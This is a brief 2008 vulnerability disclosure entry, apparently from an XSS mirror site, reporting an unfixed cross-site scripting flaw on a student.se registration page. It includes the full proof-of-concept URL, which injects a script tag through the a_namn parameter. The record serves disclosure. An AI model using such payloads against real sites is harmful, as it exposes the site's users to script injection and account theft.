Security researcher Uber0n, has submitted on 02/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.student.se, which at the time of submission ranked 81299 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/06/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 02/06/2008 |
Date published: 06/06/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Uber0n |
Domain: www.student.se |
Category: XSS |
Pagerank: 81299 |
URL: http://www.student.se/hem/registrering.php?error=1&kon=&skola=&email=&program=&poang=&a_namn=%22%3E% 3Cscript%3Ealert(123)%3C/script%3E&f_namn=&e_namn=&p_nr=&p_ort=&alder=&felav=*%20Du%20m%E5ste%20godk %E4nna%20och%20l%E4sa%20de%20Allm%E4nna%20villkoren&felprogram=*%20Du%20gl%F6mde%20att%20skriva%20vi lken%20kurs%20eller%20vilket%20program%20du%20l%E4ser!&alderfel=*%20Fyll%20i%20ditt%20f%F6delsedatum !&p_nrfel=*%20Fyll%20i%20ett%20postnummer!&postortfel=*%20Fyll%20i%20en%20postort!&losenfel=*%20L%F6 senorden%20m%E5ste%20vara%20lika%20och%20%F6ver%204%20tecken%20l%E5ngt!&a_namnfel=*%20Anv%E4ndarnamn et%20%E4r%20inte%20giltigt!&felmail=*%20Skriv%20en%20korrekt%20email-adress!&konfel=*%20V%E4lj%20ett %20k%F6n!&bonuskod=&gatuadressfel=Du%20m%E5ste%20ange%20gatuadress! |
Click here to view the mirror
|
|
|